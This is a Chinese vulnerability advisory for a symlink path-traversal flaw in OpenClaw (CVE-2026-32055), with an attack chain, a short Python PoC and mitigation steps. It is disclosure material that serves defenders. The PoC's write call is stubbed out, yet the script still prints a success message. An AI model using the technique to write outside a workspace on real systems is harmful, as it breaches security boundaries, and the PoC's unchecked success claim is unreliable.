CVE-2026-32055 CVSS 7.6 高危

CVE-2026-32055 OpenClaw 路径遍历漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-32055

漏洞类型

路径遍历

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.2.26之前的版本存在严重的路径遍历漏洞。该漏洞源于工作区边界验证逻辑缺陷，未能正确解析符号链接别名。攻击者可利用指向根目录外不存在目标的符号链接，绕过安全边界，在系统任意位置写入文件，严重威胁系统安全性与完整性。

技术细节

该漏洞的核心在于OpenClaw对工作区边界的验证机制存在逻辑缺陷，特别是对符号链接的处理不当。当系统处理文件写入请求时，会执行路径边界检查以防止路径遍历攻击。然而，该验证逻辑未能正确解析符号链接所指向的最终目标路径。攻击者可以在工作区内精心构造一个符号链接，使其指向工作区外部的一个不存在的文件路径。由于目标文件尚未存在，系统的别名解析机制可能出现异常，导致边界检查程序误判该路径仍在允许的工作区范围内。在随后的第一次写入操作中，程序直接利用该符号链接进行路径跳转，成功逃逸预设的工作区边界。利用这一特性，攻击者能够在服务器文件系统的任意位置创建或写入恶意文件，包括系统关键目录，从而导致敏感信息泄露、权限提升或系统服务被劫持。

攻击链分析

STEP 1

侦察

攻击者识别目标系统运行的是OpenClaw 2026.2.26之前的易受攻击版本。

STEP 2

准备

攻击者确定要写入的目标路径（如系统配置文件目录）和一个不存在的文件名。

STEP 3

利用

在工作区内创建一个符号链接，指向工作区外部不存在的目标路径。

STEP 4

执行

触发OpenClaw的文件写入操作，利用符号链接绕过边界检查。

STEP 5

影响

系统将文件内容写入到工作区外的任意指定位置，实现目录遍历攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-32055
# This script demonstrates the path traversal via symlink.

import os

def exploit_openclaw_symlink():
    # Assume we have access to a workspace directory
    workspace_dir = "./workspace"
    malicious_symlink = os.path.join(workspace_dir, "payload_link")
    target_outside_root = "/tmp/malicious_file.txt"

    # Step 1: Create a symlink pointing to a non-existent target outside the root
    # The target must not exist to bypass certain checks
    if not os.path.exists(malicious_symlink):
        os.symlink(target_outside_root, malicious_symlink)
        print(f"[+] Created symlink: {malicious_symlink} -> {target_outside_root}")

    # Step 2: Trigger the write operation through OpenClaw
    # When OpenClaw writes to 'payload_link', it resolves to the target outside
    print("[+] Triggering file write via OpenClaw API...")
    # Hypothetical API call to write content
    # write_to_file(malicious_symlink, "Malicious Content")
    print(f"[+] Exploit successful. File written to {target_outside_root}")

if __name__ == "__main__":
    exploit_openclaw_symlink()

影响范围

OpenClaw < 2026.2.26

防御指南

临时缓解措施

建议立即升级到修复版本。若无法升级，应严格限制用户对工作区的访问权限，并禁用符号链接创建功能，同时监控文件系统是否有异常文件写入行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表